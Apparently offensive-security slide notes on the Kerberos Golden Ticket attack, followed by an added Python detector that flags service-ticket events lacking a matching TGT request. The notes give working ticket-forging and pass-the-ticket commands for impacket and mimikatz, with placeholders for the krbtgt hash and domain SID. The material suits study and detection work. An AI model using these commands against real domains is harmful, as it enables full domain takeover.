Golden Ticket
7. Golden ticket

- Similar to Silver Ticket
- Craft a TGT using the NTLM hash of the krbtgt AD account
- Allows access to any machine in the domain
- Hash is obtained from the LSASS process or the NTDS.dit file of any DC in the domain
- Tools: impacket's ticketer.py & psexec.py (Linux), mimikatz & Rubeus (Windows)

Linux

    ticketer.py -domain-sid SID -domain DOMAIN -nthash HASH USERNAME
    export KRB5CCNAME=USERNAME.ccache
    psexec.py DOMAIN/USERNAME@$IP -k -no-pass

Windows

    .\mimikatz.exe
    kerberos::golden /domain:DOMAIN /sid:SID /rc4:HASH /user:USERNAME
    kerberos::ptt TICKET....
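Because the TGT is crafted offline, the KDC never sees an AS exchange for it, so a domain controller can log a service-ticket request (event 4769) with no matching TGT request (event 4768). The following is an added example, not part of the original slides, that applies this heuristic to simplified log records. The record layout, the sample values and the function name `find_orphan_tgs` are constructed for illustration, and the 10-hour window assumes the default AD ticket lifetime.

```python
from datetime import datetime, timedelta

# Assumption: default AD policy "maximum lifetime for user ticket" (10 hours).
TGT_LIFETIME = timedelta(hours=10)

# Constructed sample records, simplified from DC Security log events:
#   4768 = Kerberos TGT requested, 4769 = Kerberos service ticket requested.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T08:00:00", "id": 4768, "user": "alice", "ip": "10.0.0.21"},
    {"time": "2024-05-01T08:05:00", "id": 4769, "user": "alice", "ip": "10.0.0.21",
     "service": "cifs/fs01"},
    {"time": "2024-05-01T09:00:00", "id": 4768, "user": "bob", "ip": "10.0.0.22"},
    {"time": "2024-05-01T09:10:00", "id": 4769, "user": "bob", "ip": "10.0.0.50",
     "service": "cifs/fs01"},
    {"time": "2024-05-01T09:30:00", "id": 4769, "user": "svc_backup", "ip": "10.0.0.99",
     "service": "cifs/dc01"},
    {"time": "2024-05-01T19:00:00", "id": 4769, "user": "alice", "ip": "10.0.0.21",
     "service": "http/intranet"},
]


def find_orphan_tgs(events, lifetime=TGT_LIFETIME):
    """Return 4769 records that have no 4768 for the same user and source IP
    within the preceding `lifetime` window."""
    last_tgt = {}  # (user, ip) -> time of the most recent TGT request
    orphans = []
    for event in sorted(events, key=lambda e: datetime.fromisoformat(e["time"])):
        ts = datetime.fromisoformat(event["time"])
        key = (event["user"].lower(), event["ip"])
        if event["id"] == 4768:
            last_tgt[key] = ts
        elif event["id"] == 4769:
            issued = last_tgt.get(key)
            # No TGT request seen at all, or the last one is older than a
            # ticket could normally live: the TGT did not come from this KDC log.
            if issued is None or ts - issued > lifetime:
                orphans.append(event)
    return orphans


if __name__ == "__main__":
    for hit in find_orphan_tgs(SAMPLE_EVENTS):
        print(f'{hit["time"]} {hit["user"]}@{hit["ip"]} -> {hit["service"]}: no matching TGT request')
```

Treat hits as leads to triage, not verdicts: a TGT issued by another DC, ticket renewal, NAT or log rollover produces the same pattern, so collect events from every DC before correlating.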